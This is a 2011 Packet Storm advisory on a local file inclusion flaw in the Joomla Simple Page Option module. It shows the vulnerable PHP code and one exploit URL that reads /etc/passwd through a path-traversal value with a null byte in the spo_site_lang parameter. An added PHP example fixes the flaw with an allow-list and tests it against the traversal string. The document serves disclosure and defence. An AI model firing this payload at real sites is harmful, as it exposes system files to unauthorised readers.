Joomla Simple Page Option Local File Inclusion

2011-07-21T00:00:00
ID PACKETSTORM:103221
Type packetstorm
Reporter Camilo Galdos
Modified 2011-07-21T00:00:00

Description

                                        
`Simple Page Option – LFI
  
Vulnerable-Code:  
  
$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
    ? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
    : include(dirname(__FILE__).DS.'languages'.DS.'english.php');
  
  
Vulnerable-Var:  
  
spo_site_lang=  
  
  
Expl0iting:  
  
http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd%00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se
  
  
Repairing?:

Filter the spo_site_lang value with str_replace(), or use htaccess protection for the vulnerable file.
  
  
gr33tz:  
  
Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.  
`
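
An allow-list alternative to the str_replace() filter mentioned under "Repairing?:", as an added example that is not part of the original advisory or the module's own code. The helper name spo_language_file(), the temporary directory and the spanish.php file are hypothetical and constructed for the demo; only english.php as the fallback comes from the vulnerable code above.

```php
<?php
/**
 * Map a user-supplied language name to a file inside $langDir.
 * Only names that match an existing *.php file in that directory are
 * accepted; everything else falls back to english.php.
 */
function spo_language_file($requested, $langDir)
{
    $fallback = $langDir . DIRECTORY_SEPARATOR . 'english.php';

    // Reject arrays (spo_site_lang[]=x) and anything that is not a plain
    // name: no dots, slashes, NUL bytes or other separators get through.
    if (!is_string($requested)
        || !preg_match('/\A[a-z][a-z0-9_-]{0,31}\z/i', $requested)) {
        return $fallback;
    }

    // Allow-list built from the language files actually present on disk.
    $allowed = array();
    foreach (glob($langDir . DIRECTORY_SEPARATOR . '*.php') ?: array() as $path) {
        $allowed[basename($path, '.php')] = $path;
    }

    // The request only selects a key; the included path is never built
    // from request data.
    return isset($allowed[$requested]) ? $allowed[$requested] : $fallback;
}

// Constructed demo: a temporary "languages" directory with two files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'spo_lang_' . uniqid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'english.php', '<?php $lang = "en";');
file_put_contents($dir . DIRECTORY_SEPARATOR . 'spanish.php', '<?php $lang = "es";');

// Constructed sample values for spo_site_lang, valid and invalid.
$samples = array('spanish', 'german', '../../etc/passwd', "english\0", array('x'));
foreach ($samples as $value) {
    echo json_encode($value), ' => ',
         basename(spo_language_file($value, $dir)), PHP_EOL;
}

// In the module, the include would then take the resolved path.
include spo_language_file('spanish', $dir);

// Remove the demo files.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

Because the request value is only ever used as a lookup key, the check does not depend on stripping particular character sequences from the input.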